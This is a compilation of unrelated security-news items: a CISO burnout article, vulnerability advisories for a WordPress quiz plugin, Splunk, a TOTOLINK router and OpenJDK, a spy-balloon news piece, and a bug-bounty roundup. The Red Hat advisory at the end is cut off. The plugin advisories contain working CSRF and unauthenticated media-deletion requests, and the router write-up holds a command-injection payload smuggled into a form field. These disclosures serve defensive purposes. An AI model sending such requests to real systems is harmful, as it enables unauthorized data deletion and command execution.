Information security is a high-stakes field with sky-high expectations. Here's how CISOs can offset the pressures and stay healthy.

John has built a stellar reputation as a problem solver and cyber defender. Yet, today, John, the chief information security officer of a major manufacturing company, is frantically trying to find out why the CEO had been unable to retrieve or send any emails for the past four hours. The CEO is extremely irate, and as John takes in the barrage of anger, John begins to feel fear sinking into his chest. Would this incident tarnish his hard-earned reputation? Will he lose his job?

John prides himself on having answers and receiving praise for fixing problems, so he is taking this situation to heart. He started his IT security career as an analyst. He was incredibly talented at spotting gaps in security posture and determining creative ways to close those gaps. John's intelligence and innovation helped him quickly climb the ranks to CISO. However, each level of promotion brought with it increasing challenges and demands.

As an analyst, John's responsibility was confined to himself and his specific role. The CISO role has widened John's scope of responsibility immensely. He now has to manage a team of people with varying personalities; budget and request funds for projects; communicate and build relationships with other business leaders within his company; negotiate and buy products and services from vendors; and meet a number of other responsibilities. John also has to find time to be a husband, to be a father, and to take care of his own physical and mental health.

It doesn't help that John's leadership expects the IT security department to protect 100% against malicious threats targeting their company. John and his team are expected to perform perfectly. It's an unrealistic and unreasonable expectation, which leads to high stress and burnout. Unfortunately, many are in this position.

**What Leaders Should Do**

Had there been someone coaching John, he would have been taught about effective leadership traits that would help him have less emotional fallout in this scenario. There are three core tactics John could use to keep from questioning his own efficacy or suffering burnout.

**1\. See mistakes as a learning opportunity.** Mistakes happen. They are a part of life. Those who thrive see mistakes as learning opportunities and ways to get better. Accept any mistake as what it is: an outcome you did not want. Investigate what led to that outcome, determine what alternative choices were available, and understand what better option exists moving forward.

**2\. Control the controllables.** There are not a lot of things in our control. For example, we have no control over how others respond (like a yelling CEO), if a salesperson gives us all the information we need to make an educated purchase, if employees leave the company, if it's going to rain, or a litany of other things. Focusing on things outside of our control will lead to increased fear and manifesting more of what we do not want.

However, we do have the ability to focus on what we have control over. We have control over how we respond to situations; we have control over our energy, effort, and attitude; and we have control over how we choose to model for others. Focusing on what we control will not guarantee things work out. However, it will allow us to have more sanity and certainty we are doing the right things at the right time, which will increase our chances of success.

**3\. Remain calm.** When threats to our safety (real or perceived) occur, we instinctively go into survival mode — fight, flight, or freeze. In times of fear and panic, our cortex disconnects from the cerebellum, known in psychology as a "flipped lid." We lose our ability to critically think and problem-solve. Our breathing also becomes faster and shorter. You can get back to calm through your breath.

Box breathing is a simple and effective technique for recovering a mental space in which you can problem-solve. It employs four equal parts, just like the sides of a box. You inhale for 5 seconds, hold at the top of that breath for 5 seconds, exhale for 5 seconds, and hold at the bottom of that exhale for 5 seconds. Repeat this process for a minimum of 5 rounds or more.

**Reduce Stress to Reduce Turnover**

Stress is on the rise within the IT security space, which leads to problems like burnout and employee turnover. The 2022 Global Chief Information Security Officer (CISO) Survey from management consulting firm Heidrick & Struggles shows some concerning statistics. The survey showed stress (60%) and burnout (53%) were the top responses as being the most significant personal risks to CISOs in the United States.

People are leaving CISO roles for other operational positions, pursuing consulting opportunities, or not entering the CISO roles altogether. This exacerbates two big issues in the industry: not enough talent to fill seats and employee retention.

"They're \[CISOs\] choosing to punch out," Matt Aiello, partner and leader of the cyber practice at Heidrick & Struggles, told CNBC recently. "What we're hearing in off-line conversations is that it's a great role, but it's very hard and the regulatory pressures are increasing, and that makes being a CISO even more challenging."

Awareness and prioritization of mental health support and performance coaching is growing in this industry. In 2018, for example, the Black Hat conferences introduced a community track focused on mental health and other nontechnical topics that's continued to this day.

Being an IT security leader is hard. There are so many challenges to being effective in the role — unrealistic expectations of protecting your organization 100%, not getting the funding you need to purchase resources, difficulties finding and retaining good talent, etc. Ineffective leadership skills make this job harder. You and your team can thrive if you learn how to lead effectively and avoid burnout.

3 Ways CISOs Can Lead Effectively and Avoid Burnout

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a cross site request forgery vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Quiz And Survey Master  
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/  
Type:           Cross-Site Request Forgery (CSRF) [CWE-352]  
Date found:     2023-01-13  
Date published: 2023-02-08  
CVSSv3 Score:   6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)  
CVE:            CVE-2023-0292

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Quiz And Survey Master 8.0.8 and below

4. INTRODUCTION  
===============  
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used  
to create engaging content to drive traffic and increase user engagement.  
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee  
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The plugin offers the ajax action "qsm_remove_file_fd_question" which is used to  
delete uploaded media contents from the WordPress instance. However, the  
functionality is not protected by an anti-CSRF token/nonce.

Since there is no anti-CSRF token protecting this functionality, it is vulnerable  
to Cross-Site Request Forgery attacks allowing an attacker to delete uploaded  
media contents on behalf of the attacked user.

To successfully exploit this vulnerability, a user with the right to access the  
plugin must be tricked into visiting an arbitrary website while having an  
authenticated session in the application.

6. PROOF OF CONCEPT  
===================  
The following Proof-of-Concept would delete the uploaded media with the ID "1":

<html>  
    
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="qsm_remove_file_fd_question" />  
      <input type="hidden" name="media_id" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>

7. SOLUTION  
===========  
Update to version 8.0.9

8. REPORT TIMELINE  
==================  
2023-01-13: Discovery of the vulnerability  
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291  
2023-01-18: Sent initial notification to vendor via contact form  
2022-01-18: Vendor response  
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability  
2022-02-08: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress Quiz And Survey Master 8.0.8 Cross Site Request Forgery

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a missing authentication vulnerability that allows an attacker to delete media from the WordPress instance.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Quiz And Survey Master  
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/  
Type:           Missing Authentication for Critical Function [CWE-306]  
Date found:     2023-01-13  
Date published: 2023-02-08  
CVSSv3 Score:   7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)  
CVE:            CVE-2023-0291

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Quiz And Survey Master 8.0.8 and below

4. INTRODUCTION  
===============  
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used  
to create engaging content to drive traffic and increase user engagement.  
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee  
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated  
users which accepts a "media_id" parameter pointing to a any item uploaded through  
WordPress' media upload functionality. However, this "media_id" is afterward used  
in a forced wp_delete_attachment() call ultimately deleteing the media from the  
WordPress instance.

Successful exploits can allow an unauthenticated attacker to delete any (and all)  
uploaded WordPress media files.

6. PROOF OF CONCEPT  
===================  
The following Proof-of-Concept would delete the uploaded media with the ID "1":

POST /wp-admin/admin-ajax.php HTTP/2  
Host: localhost  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1

7. SOLUTION  
===========  
Update to version 8.0.9

8. REPORT TIMELINE  
==================  
2023-01-13: Discovery of the vulnerability  
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291  
2023-01-18: Sent initial notification to vendor via contact form  
2022-01-18: Vendor response  
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability  
2022-02-08: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

--  
Mit freundlichen Grüßen / With best regards / Atentamente

Julien Ahrens  
Freelancer | Penetration Tester

RCE Security  
VAT-ID: DE328576638  
Website: www.rcesecurity.com

This e-mail may contain confidential and/or privileged information.  
If you are not the intended recipient (or have received this e-mail in  
error) please notify the sender immediately and destroy this e-mail.  
Any unauthorized copying, disclosure or distribution of the material  
in this e-mail is strictly forbidden.

WordPress Quiz And Survey Master 8.0.8 Media Deletion

In Splunk Add-on Builder (AoB) versions below 4.1.2 and the Splunk CloudConnect SDK versions below 3.1.3, requests to third-party APIs through the REST API Modular Input incorrectly revert to using HTTP to connect after a failure to connect over HTTPS occurs. The vulnerability affects AoB and apps that AoB generates when using the REST API Modular Input functionality through its user interface. The vulnerability also potentially affects third-party apps and add-ons that call the *cloudconnectlib.splunktacollectorlib.cloud_connect_mod_input* Python class directly.

**Advisory ID:** SVD-2023-0213

**Published:** 2023-02-14

**Last Update:** 2023-02-14

**CVSSv3.1 Score:** 4.8, Medium

**Description**

In Splunk Add-on Builder (AoB) versions below 4.1.2 and the Splunk CloudConnect SDK versions below 3.1.3, requests to third-party APIs through the REST API Modular Input incorrectly revert to using HTTP to connect after a failure to connect over HTTPS occurs. The vulnerability affects AoB and apps that AoB generates when using the REST API Modular Input functionality through its user interface. The vulnerability also potentially affects third-party apps and add-ons that call _cloudconnectlib.splunktacollectorlib.cloud\_connect\_mod\_input_ directly.

**Solution**

For third-party apps and add-ons that include the Splunk CloudConnect SDK, upgrade the library to 3.1.3 or higher.

For customers that use AoB for custom apps, perform the following steps to update your app or add-on:

1.  Upgrade AoB to version 4.1.2 or higher. See Install the Add-on Builder User Guide for more information.
2.  Use AoB to edit and save the affected app. See Configure data collection using a REST API call for more information. It isn’t necessary to make changes to the app prior to saving it.
3.  Restart Splunk Enterprise.

If the custom app or add-on is also installed on instances without AoB, you must package the upgraded custom app or add-on, then install it on the instances. See Validate and Package and Package apps for more information.

For affected apps and add-ons that are already on SplunkBase, third-party developers must publish an updated version of the app or add-on to SplunkBase. For more information, see Publish apps for Splunk Cloud Platform or Splunk Enterprise to Splunkbase. Cloud-vetted apps are subject to the Cloud Vetting Change Policy.

Note: If the REST API Modular Input connects to a self-signed URL, that connection will fail. Where applicable, use a certificate authority (CA)-signed certificate for your app or add-on. As an alternative, to fix this error on apps and add-ons that are not on SplunkBase, overwrite the certificate at _$SPLUNK\_HOME/etc/apps/<ta\_name>/bin/<ta\_name>/aob\_py3/certifi/cacert.pem_ with the self-signed certificate. You cannot overwrite this certificate on apps or add-ons that you publish to SplunkBase.

**Product Status**

Product

Version

Component

Affected Version

Fix Version

Splunk Add-on Builder

4.1

cloudconnectlib

4.1.1 and lower

4.1.2

Splunk CloudConnect SDK

3.1

\-

3.1.2 and lower

3.1.3

**Mitigations and Workarounds**

As an alternative to updating your custom app, if the app does not use the REST API Modular Input functionality, delete the affected file at _$SPLUNK\_HOME/etc/apps/<ta\_name>/bin/<ta\_name>/aob\_py3/cloudconnectlib/core/http.py_. If the app uses the functionality, update the file or patch it with the file changes that appear in this pull request on the Splunk GitHub site.

**Detections**

None

**Severity**

Splunk rated the vulnerability as Medium, 4.8, with a CVSSv3.1 vector of CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N. The impact of the vulnerability might vary for each app or add-on. Where applicable, review your app or add-on and rate its vulnerability based on whether it uses the vulnerable functionality and what data the modular input sends or receives.

**Acknowledgments**

Chris Green

CVE-2023-22943: Modular Input REST API Requests Connect via HTTP after Certificate Validation Failure in Splunk Add-on Builder and Splunk CloudConnect SDK

A popular military tool during the Cold War, spy balloons have since fallen out of favor—for good reason.

On Friday, United States secretary of state Antony Blinken said he was canceling a high-profile diplomatic visit to Beijing following the discovery of a large, high-altitude Chinese balloon that has been drifting over the US this week. The Chinese Ministry of Foreign Affairs said in a statement on Friday that the airship is an off-course weather balloon and has denied that it is an espionage tool. A senior US Department of Defense official told reporters on Thursday, though, that “clearly the intent of this balloon is for surveillance.”

Spy balloons are a historic technology and were widely utilized before the development of low-Earth and geosynchronous satellites, including extensive use in the 1950s by the US during the Cold War. But these days, their use has largely fallen out of favor. Spy balloons have some advantages over satellites. They are cheap to deploy, fly relatively close to their targets, and can continuously monitor a location for longer stints. But balloons have weight restrictions, which also limit how powerful and diverse their onboard sensors can be. And unlike satellites, which are out of sight and out of mind for people on Earth, the situation currently playing out with the Chinese balloon illustrates the biggest limitation of surveillance balloons. 

“You may have noticed that this balloon has caused a massive international incident, and it’s got everyone looking at China and demanding that the US government do something. In terms of surveillance, this is the kind of attention you don't want,” says Brynn Tannehill, a RAND Corporation senior technical analyst and a former naval aviator. “My assessment is that the advantages a balloon offers versus the amount of unwanted attention it creates—I can't answer why the Chinese did this. It attracts ill will.”

Sensor-equipped balloons have onboard steering capabilities but are transported by wind currents. US officials said on Thursday that the spy balloon was floating above commercial air traffic at roughly 60,000 feet and that it does not pose a threat to people or activity on the ground. The senior DOD official noted that the balloon is big enough to cause a potentially dangerous debris field if the US shot down the balloon over an inhabited area. The official added that the military considered taking kinetic action on Wednesday while the balloon was moving over “sparsely populated areas in Montana,” but concluded that the risks weren't low enough. RAND's Tannehill points out that an additional risk of such an operation is that the missile aimed at the balloon will miss “and now you’ve created an even bigger problem,” she says.

Brigadier General Pat Ryder, the Pentagon press secretary, said on Thursday that, "instances of this kind of balloon activity have been observed previously over the past several years. Once the balloon was detected, the US government acted immediately to protect against the collection of sensitive information."

Reports increasingly indicate that the vehicle is part of a broader Chinese spy balloon initiative, and the senior DoD official said of spy balloon US flyovers on Thursday that “it has happened a handful of other times over the past few years, to include before this administration.” The current incident has apparently been the most visible to the US public, though.

Consistently deploying spy balloons is a strategy that the US and other countries may not be fully prepared to counter given that balloons have been less popular as espionage tools in recent decades. The senior Defense Department official said on Thursday, though, “We assess that this balloon has limited additive value from an intelligence-collection perspective” versus what China could get from satellite imagery. Still, the balloon has flown near a few US military bases and other sensitive sites. 

Tannehill says that countersurveillance measures for spy balloons would typically include physically moving equipment or personnel out of sight, rearranging equipment, and if possible, jamming the balloon's sensors.

The Defense Department declined WIRED's request to elaborate on the steps it took to prevent espionage activities.

“The fact is we know that it's a surveillance balloon, and I'm not going to be able to be more specific than that,” Brigadier General Pat Ryder said in additional remarks to reporters on Friday. “And we do know that the balloon has violated US airspace and international law, which is unacceptable. And so we've conveyed this directly to the PRC at multiple levels.” 

The Chinese Ministry of Foreign affairs said of the balloon: “The Chinese side regrets the unintended entry of the airship into US airspace due to force majeure. The Chinese side will continue communicating with the US side and properly handle this unexpected situation.”

But even with this concession, the extremely public nature of the incident can only exacerbate tensions between the US and China. As RAND's Tannehill puts it, “It’s tough to pretend the spying isn’t happening when it’s floating over Kansas City and regular people are like, ‘Oh look, it’s the Chinese spy balloon.’”

The Chinese Spy Balloon Shows the Downsides of Spy Balloons

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the setNetworkDiag function.

Permalink

Cannot retrieve contributors at this time

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "1", "NetDiagTracertHop": "20||ls;"}
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo，V11 is the value of system.NetDiag.method

CVE-2023-24143: CVE-vulns/setNetworkDiag_NetDiagTracertHop.md at main · Double-q1015/CVE-vulns

New web targets for the discerning hacker

Adam Bannister 31 January 2023 at 15:13 UTC  
Updated: 31 January 2023 at 15:23 UTC

New web targets for the discerning hacker

A bypass of Facebook’s SMS-based two-factor authentication (2FA) made it into Meta’s most impressive bug bounty finds of 2022.

However, it seems Facebook’s parent company initially didn’t fully appreciate the vulnerability, offering a $3,000 bounty before eventually revising the reward upwards to $27,200.

“Since there was no rate limit protection at all while verifying any contact points – email or phone – an attacker just knowing the phone number could add the victim’s 2FA-enabled phone number in his or her Instagram-linked Facebook account,” security researcher Manoj Gautam told The Daily Swig.

In other bug bounty news this month, a hacker duo documented Google Cloud Platform (GCP) research that resulted in six payouts totalling more than $22,000.

The most lucrative find for Sreeram KL and Sivanesh Ashok led to a double $5,000 reward for a server-side request forgery (SSRF) bug and subsequent patch bypass in machine learning platform Vertex AI.

Outlined across four blog posts, their bug bounty exploits also included an SSH key injection issue in Google Cloud’s Compute Engine and flaws in Theia and Cloud Workstations.

Cross-origin resource sharing (CORS) misconfigurations were the focus of a third bug bounty writeup covered by The Daily Swig this month.

Exploits fashioned for multiple private programs – notably including Tesla – earned Truffle Security researchers a “few thousand dollars” and vindicated their hypothesis that “large internal corporate networks are exceedingly likely to have impactful CORS \[cross-origin resource sharing\] misconfigurations”.

Fresh hacking opportunities on the horizon, meanwhile, include The US Department of Defense (DoD)’s third annual Hack The Pentagon challenge and the Zero Day Initiative’s (ZDI’s) inaugural Pwn2Own Automotive, slated for January 2024.

**The latest bug bounty programs for February 2023**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**8x8**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$1,337

**Outline:  
**The US provider of business communication technologies has invited hackers to probe its websites, mobile apps, and services such as Jitsi, its open source video meeting software.

**Notes:  
**Despite the relatively modest top bounty on offer, 8x8 has already paid out more than $90,000 in bounties within a month of its launch.

Check out the 8x8 bug bounty page for more details

**Hedera Hashgraph**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$30,000

**Outline:  
**Hedera Hashgraph describes itself as “a responsibly governed decentralized network”, with the Hedera Governing Council comprising “enterprises, web3 projects, and prestigious universities”.

**Notes:  
**There are seven assets in scope including services and mirror node codebases, Java and JavaScript SDKs, testnet API endpoints, and testnet mirror node APIs.

Check out the Hedera Hashgraph bug bounty page for more details

**Hyperlane**

**Program provider:  
**Immunefi

**Program type:  
**Public

**Max reward:  
**$2.5 million

**Outline:  
**Hyperlane describes itself as a modular interoperability platform, empowering developers to build interchain applications, apps that can easily and securely communicate between blockchains.

**Notes:  
**The life-changing maximum reward is on offer for critical bugs on smart contracts, whereas application flaws can command payouts of up to $20,000.

Check out the Hyperlane bug bounty page for more details

**Kiwi.com**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Czech online travel agency Kiwi.com provides a fare aggregator, metasearch engine, and booking function for airline tickets and ground transportation.

**Notes:  
**In-scope targets include the main website, kiwi.com; tequila.kiwi.com; jobs.kiwi.com; source code; APIs and internal tools; and mobile applications.

Check out the Kiwi.com bug bounty page for more details

**Net+**

**Program provider:  
**GObugfree

**Program type:  
**Mix of public and private

**Max reward:  
**CHF5,000 ($5,389)

**Outline:  
**Netplus.ch, which provides internet, telephony, and TV services to more than 220,000 users in Switzerland, is paying between CHF 2,000-5,000 for critical bugs.

**Notes:  
**New targets are initially restricted to the private program for a period of initial testing, before being opened up to the broader hacking community within the public program.

Check out the Net+ private and public bug bounty pages for more details

**Open-Xchange (OX) App Suite**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**€5,000 ($5,430)

**Outline:  
**Open-Xchange’s OX App Suite is an open source email and productivity suite that purports to favor security by default rather than security through obscurity.

**Notes:  
**Open-Xchange, hitherto a HackerOne client, has migrated its bug bounty programs to YesWeHack. CISO Martin Heiland recently discussed the hacking opportunities on offer with the Paris-based platform.

Check out the OX App Suite bug bounty page for more details

**Open-Xchange Dovecot**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**€5,000 ($5,430)

**Outline:  
**Dovecot is Open-Xchange’s IMAP, POP3, and submission server for email, used within multiple operating systems and by “millions of operators”.

**Notes:  
**Open-Xchange, hitherto a HackerOne client, has migrated its bug bounty programs to YesWeHack. CISO Martin Heiland recently discussed the hacking opportunities on offer with the Paris-based platform.

Check out the Dovecot bug bounty page for more details

**Open-Xchange PowerDNS**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**€5,000 ($5,430)

**Outline:  
**PowerDNS is a DNS server that enables domain resolution and network security features.

**Notes:  
**Open-Xchange, hitherto a HackerOne client, has migrated its bug bounty programs to YesWeHack. CISO Martin Heiland recently discussed the hacking opportunities on offer with the Paris-based platform.

Check out the PowerDNS bug bounty page for more details

**S-Pankki**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**The Finnish bank is offering up to $4,000 for critical vulnerabilities, $2,000 for high severity flaws, and $1,000 for medium severity bugs.

**Notes:  
**There are 11 assets in scope, including nine domains plus iOS and Android mobile applications.

Check out the S-Pankki bug bounty page for more details

**Superbet**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,000

**Outline:  
**The Romanian online gaming company is offering a maximum of $2,000 for critical bugs, $1,000 for high severity issues, and $250 for medium impact vulnerabilities.

**Notes:  
**Just the one asset in scope: the.superbet.ro domain.

Check out the Superbet bug bounty page for more details

**Swiss Bankers**

**Program provider:  
**GObugfree

**Program type:  
**Private

**Max reward:  
**Undisclosed

**Outline:  
**Swiss Bankers is a financial services firm specializing in prepaid credit cards, mobile payment, and money transfer.

**Notes:  
**Hackers can participate by invitation only.

Check out the Swiss Bankers bug bounty page for more details

**Threema (Enhanced)**

**Program provider:  
**GObugfree

**Program type:  
**Public

**Max reward:  
**CHF10,000 ($10,778)

**Outline:  
**Swiss instant messenger service Threema has upped maximum payouts from CHF4,000 ($4,311) To CHF10,000 ($10,778) after launching the program in May 2022.

**Notes:  
**This news comes after the privacy-focused software disputed claims that there were several security flaws in its encrypted messaging platform.

Check out the Threema bug bounty page for more details

**TRON DAO**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**TRON DAO is an open source platform for creating decentralized applications, new financial primitives, and interoperable blockchains.

**Notes:  
**TRON’s Java source code is currently the sole asset in scope.

Check out the TRON DAO bug bounty page for more details

**Wato-soft**

**Program provider:  
**GObugfree

**Program type:  
**Private

**Max reward:  
**Undisclosed

**Outline:  
**Swiss IT services firm specializing in Enterprise resource planning (ERP) software.

**Notes:  
**Hackers can participate by invitation only.

Check out the Wato-Soft bug bounty page for more details

**Other bug bounty and VDP news this month**

*   An Amazon virtual hacking event with HackerOne was the platform’s highest paying virtual event ever, with more than 50 security researchers collectively earning $832,135. The 10-day hackathon’s overall winner was @jonathanbouman, while ‘Best Team Collaboration’ went to ‘spacebaffoons’ @the\_arch\_angel, @spaceraccoon, and (one time Daily Swig interviewee) @ajxchapman
*   As referenced in our latest Deserialized roundup, Intigriti has flagged a Belgium-wide safe harbor clause in the country’s proposed whistleblower law, and a New Scientist feature on a mathematical means of demonstrating valid exploits without risking public disclosure
*   Finally, YesWeHack has penned a how-to on using Burp Suite extension Highlighter And Extractor (HaE) to surface vulnerabilities via regular expressions

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for January 2023

Bug Bounty Radar // The latest bug bounty programs for February 2023

Red Hat Security Advisory 2023-0208-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include a deserialization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:0208-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0208  
Issue date:        2023-01-26  
CVE Names:         CVE-2023-21830 CVE-2023-21843   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper restrictions in CORBA deserialization (Serialization,  
8285021) (CVE-2023-21830)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Leak File Descriptors Because of  
ResolverLocalFilesystem#engineResolveURI() (BZ#2139705)

* Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362)  
[rhel-8] (BZ#2159910)

* solr broken due to access denied ("java.io.FilePermission"  
"/etc/pki/java/cacerts" "read") [rhel-8, openjdk-8] (BZ#2163595)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2139705 - Leak File Descriptors Because of ResolverLocalFilesystem#engineResolveURI() [rhel-8.7.0.z]  
2159910 - Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362) [rhel-8] [rhel-8.7.0.z]  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)  
2160490 - CVE-2023-21830 OpenJDK: improper restrictions in CORBA deserialization (Serialization, 8285021)  
2163595 - solr broken due to access denied ("java.io.FilePermission" "/etc/pki/java/cacerts" "read") [rhel-8, openjdk-8] [rhel-8.7.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b09-2.el8_7.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b09-2.el8_7.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
